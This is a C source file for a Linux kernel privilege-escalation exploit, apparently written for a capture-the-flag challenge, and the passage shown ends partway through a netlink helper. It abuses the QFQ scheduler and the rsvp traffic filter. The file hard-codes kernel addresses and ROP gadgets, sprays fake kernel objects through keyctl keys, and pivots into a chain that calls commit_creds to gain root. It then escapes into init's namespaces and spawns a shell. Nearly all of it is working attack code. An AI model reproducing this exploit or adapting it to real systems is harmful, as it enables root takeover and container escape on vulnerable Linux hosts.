#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <linux/keyctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/if_packet.h>
#include <linux/pkt_cls.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <signal.h>
#include <netinet/in.h>

// Fixed-width integer shorthands; the _Static_asserts below pin their sizes
// at compile time.
// NOTE(review): i8 is plain `char`, whose signedness is
// implementation-defined — presumably signed was intended; confirm if i8
// arithmetic is ever relied upon.
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef char i8;
typedef short i16;
typedef int i32;
typedef long long i64;

_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1");
_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2");
_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4");
_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8");
_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1");
_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2");
_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4");
_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8");

// Minimal logging helpers (info / error, both to stdout).
#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__)
#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__)

// perror() the failing expression and bail out of the enclosing function.
// Only usable in functions returning int (or compatible).
#define FAIL_IF(x) if ((x)) { \
    perror(#x); \
    return -1; \
}

// Byte-repetition helpers for building raw payload arrays.
// NOTE(review): `x` is deliberately not parenthesized — callers pass simple
// character/int literals only.
#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x
#define pad8(x) pad4(x), pad4(x)

// Emit a 64-bit value as 8 little-endian byte initializers.
#define p64(x) (u8)(((x) >> 0) & 0xFF), \
    (u8)(((u64)(x) >> 8) & 0xFF), \
    (u8)(((u64)(x) >> 16) & 0xFF), \
    (u8)(((u64)(x) >> 24) & 0xFF), \
    (u8)(((u64)(x) >> 32) & 0xFF), \
    (u8)(((u64)(x) >> 40) & 0xFF), \
    (u8)(((u64)(x) >> 48) & 0xFF), \
    (u8)(((u64)(x) >> 56) & 0xFF)

// Element count of an actual array (do not use on pointers).
#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

#define PACK __attribute__((__packed__))

// Tiny cross-process event primitive built on an int in shared (CLONE_VM)
// memory: "set" hands control over, EVENT_WAIT spins (with sleep) until set
// and atomically consumes the event again.
#define __EVENT_SET 0
#define __EVENT_UNSET 1

#define EVENT_DEFINE(name, init) volatile int name = init
#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); }

#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE)
#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE)

// GADGETS {

// Kernel virtual addresses for one specific kernel build, taken from the
// unslid (static) kernel image. They are rebased at runtime: once
// cls_rsvp_ops is leaked, the KASLR slide is computed and FOR_ALL_OFFSETS
// subtracts it from every entry below.
u64 cls_rsvp_ops = 0xffffffff8395e320;

// Kernel functions / objects used by the ROP chain (privilege escalation and
// namespace escape).
u64 find_task_by_vpid = 0xffffffff811b5670;
u64 switch_task_namespaces = 0xffffffff811bd1f0;
u64 commit_creds = 0xffffffff811bed80;
u64 prepare_kernel_cred = 0xffffffff811bf020;
u64 init_task = 0xffffffff83615a40;
u64 init_nsproxy = 0xffffffff836765c0;

// iretq trampoline used to return cleanly to user space.
u64 ___trampoline_start_iretq = 0xffffffff822010c6;

// ROP gadgets (disassembly and raw bytes documented inline).
u64 mov_rdi_rax = 0xffffffff810eb083; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3
u64 pop_rcx_ret = 0xffffffff810271ec; // pop rcx; ret // 59c3
u64 pop_rsi = 0xffffffff8100256c; // pop rsi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5ee9ce1e4001c3
u64 pop_rdi = 0xffffffff81002cd5; // pop rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5fe97e094001c3

u64 mov_rax_rdi_jmp_zen_ret = 0xffffffff810fdd45; // mov rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889f8e991414001c3

// Stack-pivot gadgets used to move execution from the small (104-byte) fake
// object onto the larger ROP stack in the kmalloc-8192 spray object.
u64 push_rsi_jmp_rsi_0x39 = 0xffffffff8198915b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639
u64 pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret = 0xffffffff810e8603; // pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5c4883c4185b5d415ce94f4d3c01c3
u64 mov_rsp_rbp_pop_rbp_ret = 0xffffffff8112cf2c; // mov rsp, rbp; pop rbp; ret // 4889ec5dc3

// } GADGETS

// Apply `x` to every rebasable kernel address above.
#define FOR_ALL_OFFSETS(x) do { \
    x(cls_rsvp_ops); \
    x(find_task_by_vpid); \
    x(switch_task_namespaces); \
    x(commit_creds); \
    x(prepare_kernel_cred); \
    x(init_task); \
    x(init_nsproxy); \
    x(___trampoline_start_iretq); \
    x(mov_rdi_rax); \
    x(pop_rcx_ret); \
    x(pop_rsi); \
    x(pop_rdi); \
    x(mov_rax_rdi_jmp_zen_ret); \
    x(push_rsi_jmp_rsi_0x39); \
    x(pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret); \
    x(mov_rsp_rbp_pop_rbp_ret); \
  } while(0)

// Reverse calculation of the index in sch_qfq.c:qfq_calc_index
// Our desired index will be 27 so that the fake group resides at offset 288 into
// our large spray object.
#define _TARGET_INDEX 27
#define _MIN_SLOT_SHIFT 25
#define _NUM_CLS 1
#define _CLS_WEIGHT 1
#define _ONE_FP 0x40000000
#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1 + 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS)

// Spray type tags understood by the spray() proxy (see prototypes below).
#define SPRAY_8192 1
#define SPRAY_128 2

// sizeof(struct user_key_payload) header that precedes key data in-slab;
// all fake-object layouts below are shifted by this amount.
#define SIZEOF_USER_KEY_PAYLOAD 24

// Userspace mirrors of the kernel's doubly-linked list / hash-list node
// types. Layouts must match the kernel exactly; the pahole-style offset
// comments are kept as documentation.
struct list_head {
  struct list_head *         next;                 /*     0     8 */
  struct list_head *         prev;                 /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};

struct hlist_node {
  struct hlist_node *        next;                 /*     0     8 */
  struct hlist_node * *      pprev;                /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};

// Tail of the kernel's struct qfq_aggregate, starting at offset 24
// (SIZEOF_USER_KEY_PAYLOAD): the first 24 bytes are occupied by the
// user_key_payload header when this fake object lives in a sprayed key,
// hence the commented-out leading members.
struct qfq_aggregate_partial {
  // struct hlist_node          next;                 /*     0    16 */
  // u64                        S;                    /*    16     8 */
  u64                        F;                    /*    24     8 */
  struct qfq_group *         grp;                  /*    32     8 */
  u32                        class_weight;         /*    40     4 */
  int                        lmax;                 /*    44     4 */
  u32                        inv_w;                /*    48     4 */
  u32                        budgetmax;            /*    52     4 */
  u32                        initial_budget;       /*    56     4 */
  u32                        budget;               /*    60     4 */
  /* --- cacheline 1 boundary (64 bytes) --- */
  int                        num_classes;          /*    64     4 */

  u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */

  struct list_head           active;               /*    72    16 */
  struct hlist_node          nonfull_next;         /*    88    16 */

  /* size: 104, cachelines: 2, members: 13 */
  /* sum members: 100, holes: 1, sum holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;
_Static_assert(sizeof(struct qfq_aggregate_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD);

// Tail of the kernel's struct tcf_proto, again offset by the 24-byte
// user_key_payload header (first three members commented out). Holes in the
// kernel layout are made explicit as __pad fields because the struct is
// packed here.
struct tcf_proto_partial {
  // void*         next;                 /*     0     8 */
  // void *                     root;                 /*     8     8 */
  // int                        (*classify)(struct sk_buff *, const struct tcf_proto  *, struct tcf_result *); /*    16     8 */
  u16                     protocol;             /*    24     2 */

  /* XXX 2 bytes hole, try to pack */
  u8 __pad0[2];

  u32                        prio;                 /*    28     4 */
  void *                     data;                 /*    32     8 */
  const void  * ops;               /*    40     8 */
  struct tcf_chain *         chain;                /*    48     8 */
  u32                 lock;                 /*    56     4 */
  u8                       deleting;             /*    60     1 */

  /* XXX 3 bytes hole, try to pack */
  u8 __pad1[3];

  /* --- cacheline 1 boundary (64 bytes) --- */
  u32                 refcnt;               /*    64     4 */

  /* XXX 4 bytes hole, try to pack */
  u8 __pad2[4];

  u8       rcu[16];
  struct hlist_node          destroy_ht_node;      /*    88    16 */

  /* size: 104, cachelines: 2, members: 13 */
  /* sum members: 95, holes: 3, sum holes: 9 */
  /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;
_Static_assert(sizeof(struct tcf_proto_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD);


// Mirror of the kernel's struct tcf_proto_ops with all argument types erased
// to void* (only offsets and sizes matter — the kernel calls through these
// slots). The fake ops table only populates `kind`, `get` and `dump`; see
// prep_final_large_payload().
struct tcf_proto_ops {
  struct list_head           head;                 /*     0    16 */
  char                       kind[16];             /*    16    16 */
  int                        (*classify)(void*, const void*, void*); /*    32     8 */
  int                        (*init)(void*); /*    40     8 */
  void                       (*destroy)(void*, u8, void*); /*    48     8 */
  void *                     (*get)(void*, u32); /*    56     8 */
  /* --- cacheline 1 boundary (64 bytes) --- */
  void                       (*put)(void*, void *); /*    64     8 */
  int                        (*change)(void*, void*, void*, long unsigned int, u32, void**, void **, u32, void*); /*    72     8 */
  int                        (*delete)(void*, void*, u8*, u8, void*); /*    80     8 */
  u8                       (*delete_empty)(void*); /*    88     8 */
  void                       (*walk)(void*, void*, u8); /*    96     8 */
  int                        (*reoffload)(void*, u8, void *, void *, void*); /*   104     8 */
  void                       (*hw_add)(void*, void *); /*   112     8 */
  void                       (*hw_del)(void*, void *); /*   120     8 */
  /* --- cacheline 2 boundary (128 bytes) --- */
  void                       (*bind_class)(void *, u32, long unsigned int, void *, long unsigned int); /*   128     8 */
  void *                     (*tmplt_create)(void*, void*, void**, void*); /*   136     8 */
  void                       (*tmplt_destroy)(void *); /*   144     8 */
  int                        (*dump)(void*, void*, void *, void*, void*, u8); /*   152     8 */
  int                        (*terse_dump)(void*, void*, void *, void*, void*, u8); /*   160     8 */
  int                        (*tmplt_dump)(void*, void*, void *); /*   168     8 */
  struct module *            owner;                /*   176     8 */
  int                        flags;                /*   184     4 */

  /* size: 192, cachelines: 3, members: 22 */
  /* padding: 4 */
} PACK;

// Mirror of the kernel's hash-list head (single forward pointer).
struct hlist_head {
  struct hlist_node *        first;                /*     0     8 */

  /* size: 8, cachelines: 1, members: 1 */
  /* last cacheline: 8 bytes */
};

// Mirror of the kernel's struct qfq_group. A fake instance of this is
// embedded at offset 0x108 of the large spray payload; its `index` field is
// what drives the out-of-bounds bitmap flip (see prep_stage1_large_payload).
struct qfq_group {
  u64                        S;                    /*     0     8 */
  u64                        F;                    /*     8     8 */
  unsigned int               slot_shift;           /*    16     4 */
  unsigned int               index;                /*    20     4 */
  unsigned int               front;                /*    24     4 */

  u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */

  long unsigned int          full_slots;           /*    32     8 */
  struct hlist_head          slots[32];            /*    40   256 */

  /* size: 296, cachelines: 5, members: 7 */
  /* sum members: 292, holes: 1, sum holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;

// Key handle as used by the keyctl(2) interface.
typedef i32 key_serial_t;

// Minimal bookkeeping record for a sprayed key (serial + spray type tag).
struct key {
  key_serial_t id;
  int type;
};

// Thin syscall wrapper, defined elsewhere (glibc has no keyctl prototype
// without libkeyutils).
long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5);

// Header of the ROP region inside the large spray payload: the fake
// tcf_proto_ops table immediately followed by the ROP stack.
// NOTE(review): `stack[0]` is the GNU zero-length-array idiom; a C99
// flexible array member (`stack[]`) would be the standard spelling, but the
// layout is identical here.
struct rop_payload_head {
  struct tcf_proto_ops ops;
  u8 stack[0];
} PACK;

// Large spray payload (kmalloc-8192)
// This will host the fake qfq_group object in stage 1
// Eventually it will contain both the prepared stack and the tcf_proto_ops
// which the fake tcf_proto will reference
// The 4097-byte key payload size (plus the 24-byte user_key_payload header)
// lands the allocation in kmalloc-8192; the group sits at slab offset 288
// (= 0x108 + header), matching the reverse-engineered qfq_calc_index above.
struct key_payload_large {
  struct {
    u8 __pad02[288 - SIZEOF_USER_KEY_PAYLOAD];
    struct qfq_group group;
  } PACK;
  struct rop_payload_head rop;
  u8 __pad2[4097 - sizeof(struct qfq_group) - 288 - sizeof(struct rop_payload_head)];
} PACK;
_Static_assert(sizeof(struct key_payload_large) == 4097 - SIZEOF_USER_KEY_PAYLOAD);
_Static_assert(__builtin_offsetof(struct key_payload_large, group) == 0x108);

// Small spray payload (104 bytes)
// Used for fake qfq_aggregate as well as fake tcf_proto
// In the case of tcf_proto, we overlay the structure with
// a temporary stack from which we will eventually pivot into
// the larger stack prepared in the larger payload.
// The stack is carefully crafted to not interfere with the rest
// of the structure.
// All three views share the same bytes via anonymous unions; the __pad
// arrays position each view's fields at the exact in-slab offsets the
// corresponding gadget reads (0x18 for the pop-rsp pivot, 0x39 for the
// jmp [rsi+0x39] dispatch).
struct key_payload_small {
  union {
    struct qfq_aggregate_partial agg;
    union {
      struct tcf_proto_partial tp;
      struct {
        // payload for pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; ret
        u8 __pad0[0x18 - SIZEOF_USER_KEY_PAYLOAD];
        u64 scratch_rbx;
        u64 rbp;
        u64 scratch_r12;
        u64 stack[1];
      } PACK;
      struct {
        // payload for push rsi; jmp qword ptr [rsi+0x39]
        u8 __pad1[0x39 - SIZEOF_USER_KEY_PAYLOAD];
        u64 jmp_target;
      } PACK;
    };
  };
} PACK;
_Static_assert(sizeof(struct key_payload_small) == 104 - SIZEOF_USER_KEY_PAYLOAD);

// keyctl will be a bit sketchy because of our multi-process exploit.
// These functions proxy calls through to a child process which possesses
// all the keys.
int spray(int type, int n, void* payload, size_t plen);
int spray_reset();
int spray_reset_except(struct key* ids, size_t num_ids);
int spray_exit();

const struct key* get_key(unsigned index);

// Pin the calling process to CPU `id` via sched_setaffinity(2).
// Returns 0 on success, -1 with errno set on failure.
static int _pin_to_cpu(int id) {
  cpu_set_t mask;

  CPU_ZERO(&mask);
  CPU_SET(id, &mask);

  return sched_setaffinity(getpid(), sizeof(mask), &mask);
}

// Final-stage worker bookkeeping (pid + its clone stack).
int final_stage_pid = 0;
void* final_stage_stack = NULL;

// Reusable payload buffers and the key serials they were sprayed under.
static struct key_payload_small agg; // SPRAY_128
static struct key_payload_large large; // SPRAY_8192
static key_serial_t id_agg;
static key_serial_t id_large;

// Kernel pointers recovered during the exploit (heap + KASLR leaks).
static u64 leak_agg_ptr = 0;
static u64 leak_grp_ptr = 0;
static u64 leak_cls_rsvp_ops = 0;

// Fully-built ROP payload blob (filled in later stages).
static u8* rop_payload = NULL;
static u32 rop_payload_size = 0;

// Bounce buffer for keyctl reads (and user-space stack for the iretq frame).
static u8* scratch_buf = NULL;

// Tunables for the spray cadence.
#ifndef DO_BEFORE
#define DO_BEFORE 1
#endif

#ifndef ATTEMPT_LARGE_EVERY
#define ATTEMPT_LARGE_EVERY 17
#endif
#ifndef ATTEMPT_SMALL_EVERY
#define ATTEMPT_SMALL_EVERY 27
#endif

// argv for the post-exploit shell: print the flag, then drop to a shell.
static char* shell_argv[] = {
    "/bin/sh",
    "-c",
    "/bin/cat /flag && /bin/sh",
    NULL,
};

// Final-stage user-space landing point (reached via the iretq frame in the
// ROP chain): re-attach to init's mount/pid/net namespaces, then exec a
// shell that prints the flag.
// NOTE(review): the open()/setns() return values are deliberately ignored —
// by the time this runs we either have full privileges or the exploit has
// already failed.
void shell() {
  L("escape ..");
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  L("spawning shell ..");
  execve(shell_argv[0], shell_argv, NULL);
  exit(1);
}

// Fill `agg` with a fake (partial) struct qfq_aggregate.
// `marker` is an arbitrary value stored in F so the object can be recognized
// later; `lmax` is the lookup key the kernel matches on.
void prep_agg_payload(struct qfq_aggregate_partial* agg, u64 marker, u32 lmax) {
  memset(agg, 0, sizeof(*agg));

  // The two fields qfq_find_agg() actually matches on:
  //
  // hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next)
  //    if (agg->lmax == lmax && agg->class_weight == weight)
  //        return agg;
  agg->class_weight = 1;
  agg->lmax = lmax;

  // Recognizable marker; the kernel does not interpret F on this path.
  agg->F = marker;

  // Remaining scheduling state is irrelevant for our purposes.
  agg->grp = NULL;
  agg->inv_w = 0;
  agg->budgetmax = 0;
  agg->initial_budget = 0;
  agg->budget = 0;

  // Zero, so the kernel frees this aggregate when its class is deleted.
  agg->num_classes = 0;

  // Keep the active list empty. This is fine iff the class we attach to this
  // fake agg has no queued packets; otherwise qfq_add_to_agg would do:
  //
  // if (cl->qdisc->q.qlen > 0) { /* adding an active class */
  //   list_add_tail(&cl->alist, &agg->active);
  //   if (list_first_entry(&agg->active, struct qfq_class, alist) ==
  //       cl && q->in_serv_agg != agg) /* agg was inactive */
  //     qfq_activate_agg(q, agg, enqueue); /* schedule agg */
  // }
  //
  // which is complicated to survive, so we simply avoid that path.
  agg->active.next = NULL;
  agg->active.prev = NULL;

  // This fake agg should be the first entry walked in nonfull_aggs, so NULL
  // links are acceptable for the hlist traversal above.
  agg->nonfull_next.next = NULL;
  agg->nonfull_next.pprev = NULL;
}

// Build the fake tcf_proto payload (104-byte object). The same bytes serve
// three overlapping purposes via the unions in struct key_payload_small:
//  - a plausible struct tcf_proto whose ->ops points into the sprayed
//    kmalloc-8192 object (leak_grp_ptr + offset of rop.ops),
//  - the scratch mini-stack consumed by the first pivot gadget
//    (pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; ret),
//  - the jump target read by the dump gadget (push rsi; jmp [rsi+0x39]).
void prep_tcf_proto_payload(struct key_payload_small* p) {
  memset(p, 0, sizeof(*p));

  p->tp.protocol = 0xdead; // marker value
  p->tp.prio = 0x22220000;
  // ops -> fake tcf_proto_ops embedded in the large (kmalloc-8192) payload
  p->tp.ops = (void*)(leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.ops) + SIZEOF_USER_KEY_PAYLOAD);

  // interleaved stack, pivot to larger stack in 8192 buffer
  p->rbp = (leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.stack) + SIZEOF_USER_KEY_PAYLOAD);
  p->stack[0] = mov_rsp_rbp_pop_rbp_ret;

  // first pivot to the interleaved stack
  p->jmp_target = pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret;

  // This refcount is on top of one of our gadgets. It will be incremented on trigger
  // (pre-decremented here so the increment restores the gadget bytes).
  p->tp.refcnt -= 1;
}

// Prepare the stage-1 kmalloc-8192 spray payload: all zeroes except the fake
// qfq_group's index. The kernel uses grp->index as a bit number, so this
// value flips bit 7 of the byte 7440 bytes past qfq_sch->bitmaps:
// (offsetof(struct qfq_sch, nonfull_aggs) - offsetof(struct qfq_sch, bitmaps)) * 8 + (FFS(0x80) = 7)
void prep_stage1_large_payload(struct key_payload_large* large) {
  memset(large, 0, sizeof(*large));
  large->group.index = (7440 * 8) + 7;
}

// Build the final kmalloc-8192 payload: the fake tcf_proto_ops table plus
// the full ROP stack that the small-payload pivot chain lands on.
void prep_final_large_payload(struct key_payload_large* large) {
  memset(large, 0, sizeof(*large));

  // Capture our current code/stack segment selectors for the iretq frame.
  u64 cs;
  u64 ss;
  asm(
    "movq %%cs, %0;"
    "movq %%ss, %1;"
    : "=r"(cs), "=r"(ss)
  );

  u8 rop[] = {
    pad8('R'), // rbp
    // commit_creds(prepare_kernel_cred(&init_task))
    p64(pop_rdi),
    p64(init_task),
    p64(prepare_kernel_cred),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(commit_creds),

    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
    p64(pop_rdi),
    p64(1),
    p64(find_task_by_vpid),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(pop_rsi),
    p64(init_nsproxy),
    p64(switch_task_namespaces),

    // Return to user space through the kernel's iretq trampoline.
    p64(___trampoline_start_iretq),

    pad8('A'), // rax;
    pad8('I'), // rdi;

    // iretq frame: rip, cs, rflags, rsp, ss — lands in shell() on a
    // scratch-buffer stack.
    p64((u64)&shell),
    p64(cs),
    p64(0), // flags
    p64((u64)(scratch_buf + 0x4000)), // rsp
    p64(ss),
  };

  // Only kind/get/dump of the fake ops table matter: get() and dump() are
  // the two slots the kernel will call into.
  strcpy(large->rop.ops.kind, "exploit");
  large->rop.ops.get = (void*)mov_rax_rdi_jmp_zen_ret;
  large->rop.ops.dump = (void*)push_rsi_jmp_rsi_0x39;

  memcpy(large->rop.stack, rop, sizeof(rop));
}

// Read the payload of key `id` into `buf` (at most `buflen` bytes), bouncing
// through the global scratch buffer.
// Returns the full key length as reported by KEYCTL_READ (which may exceed
// `buflen`), or a negative value on error.
int read_key(key_serial_t id, void* buf, u32 buflen) {
  if (scratch_buf == NULL) {
    return -1;
  }

  int keylen = keyctl(KEYCTL_READ, id, (unsigned long)scratch_buf, 0x10000, 0);
  if (keylen < 0) {
    return keylen;
  }

  // Copy out no more than the caller asked for.
  u32 ncopy = (u32)keylen < buflen ? (u32)keylen : buflen;
  memcpy(buf, scratch_buf, ncopy);

  return keylen;
}

// Worker slot table: pid of each cloned worker plus its (cached, reusable)
// stack mapping. `last_worker` is the next free slot index.
static int last_worker = 0;
static struct {
    int pid;
    void* stack;
} workers[200] = {0};

// Spawn a worker running `target(arg)` in fresh user + net namespaces while
// sharing our address space (CLONE_VM, so the EVENT_* machinery works).
// Worker stacks are 16 KiB anonymous mappings cached in workers[] so a slot
// can be reused after kill_worker().
// Returns the worker's index into workers[], or -1 on failure.
int spawn_worker(int (*target)(void*), void* arg) {
  // BUGFIX: bound the slot index — previously a 201st spawn would write past
  // the end of workers[].
  if (last_worker < 0 || (size_t)last_worker >= ARRAY_LEN(workers)) {
    E("out of worker slots");
    return -1;
  }

  void* stack = workers[last_worker].stack;

  if (stack == NULL) {
    stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    FAIL_IF(stack == MAP_FAILED);
    workers[last_worker].stack = stack;
  }

  // The stack grows down: hand clone() the top of the mapping.
  int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg);

  if (child < 0) {
    return -1;
  }

  workers[last_worker].pid = child;
  last_worker++;

  return last_worker - 1;
}

// SIGKILL the worker in slot `index` and mark the slot dead. Only the
// top-most slot is returned to the free pool (its stack mapping stays cached
// either way).
// Returns 0 on success, -1 if the slot holds no live worker.
int kill_worker(int index) {
  if (workers[index].pid <= 0) {
    E("worker %d does not exist?", index);
    return -1;
  }

  kill(workers[index].pid, SIGKILL);
  workers[index].pid = -1;

  // Reclaim the slot only if it was the most recently handed out.
  if (index == last_worker - 1) {
    last_worker--;
  }

  return 0;
}

// Decode a NLMSG_ERROR reply in `nlh`. Returns the embedded (negative)
// kernel error code, or 0 for an ACK; a failure is also mirrored into errno.
// `fd` is unused and kept only for signature symmetry with the other
// netlink helpers.
int netlink_errno(int fd, struct nlmsghdr* nlh) {
  (void)fd;

  assert(nlh->nlmsg_type == NLMSG_ERROR);

  struct nlmsgerr* err = NLMSG_DATA(nlh);
  assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*err)));

  int code = err->error;
  if (code != 0) {
    printf("ERROR: netlink error: %d\n", code);
    errno = -code;
  }

  return code;
}

// Send `size` bytes from `buf` as a netlink request on `fd`, then receive
// the kernel's reply back into the same buffer (which must be large enough;
// the reply length is discovered first with MSG_PEEK | MSG_TRUNC).
// Returns the number of bytes received, or -1 on error.
int netlink_send_recv(int fd, void* buf, int size) {
  struct iovec iov = {
    .iov_base = buf,
    .iov_len = size,
  };
  struct msghdr msg = {
    .msg_name = NULL,
    .msg_namelen = 0,
    .msg_iov = &iov,
    .msg_iovlen = 1,
    .msg_control = NULL,
    .msg_controllen = 0,
    .msg_flags = 0,
  };
  if (sendmsg(fd, &msg, 0) < 0) {
    perror("sendmsg()");
    return -1;
  }

  // Peek to learn the pending reply's length without consuming it.
  msg.msg_flags = MSG_TRUNC;
  msg.msg_iov = NULL;
  msg.msg_iovlen = 0;
  // BUGFIX: recvmsg()'s result must be checked in a signed variable.
  // Previously it was stored straight into iov.iov_len (a size_t), so the
  // `< 0` error check was always false and recvmsg() failures were silently
  // turned into a huge read length.
  ssize_t peeked = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC);
  if (peeked < 0) {
    perror("recvmsg()");
    return -1;
  }
  iov.iov_len = (size_t)peeked;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  return recvmsg(fd, &msg, 0);
}

// Handshake state shared (via CLONE_VM) between main and the workers:
// `wake` carries the id of the worker allowed to proceed, `done` tells all
// workers to wind down.
volatile int wake = 0;
volatile int done = 0;
// event which will be set whenever control is handed over back to main
static EVENT_DEFINE(parent_notify, __EVENT_UNSET);
// event which will be set whenever control is handed over back to the final stage worker
static EVENT_DEFINE(final_worker_notify, __EVENT_UNSET);

// Bring interface `ifindex` up and set its MTU to 0x1000 via an RTM_NEWLINK
// request on netlink socket `s`.
// Returns 0 on success, -1 on failure.
int prepare_device(int s, int ifindex) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  FAIL_IF(nlh == NULL);

  struct ifinfomsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWLINK;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  // Up the device
  data->ifi_family = PF_UNSPEC;
  data->ifi_type = 0;
  data->ifi_index = ifindex;
  data->ifi_flags = IFF_UP;
  data->ifi_change = 1;

  // Attach an IFLA_MTU attribute (u32 payload).
  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  attr->nla_type = IFLA_MTU;
  attr->nla_len = NLA_HDRLEN + 4;
  u32* attr_data = (void*)attr + NLA_HDRLEN;
  *attr_data = 0x1000;

  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to prepare device!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a rsvp tcfilter, used to spray our tcf_proto object
// Create an rsvp traffic-classifier filter (RTM_NEWTFILTER) on the qdisc
// `parent` of `ifindex`, with the given `prio`. Each call allocates a
// struct tcf_proto in the kernel — this is the spray primitive for the
// final stage.
// Returns 0 on success (EBUSY is tolerated, see below), -1 on failure.
int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  // BUGFIX: calloc() was dereferenced without a NULL check (the sibling
  // helpers such as prepare_device() already guard this).
  FAIL_IF(nlh == NULL);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTFILTER;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = 0;

  // tcm_info packs (prio << 16) | protocol; protocol 8 == ETH_P_IP in
  // network byte order.
  u16 protocol = 8;
  data->tcm_info = ((u32)prio << 16) | (u32)protocol;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "rsvp");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

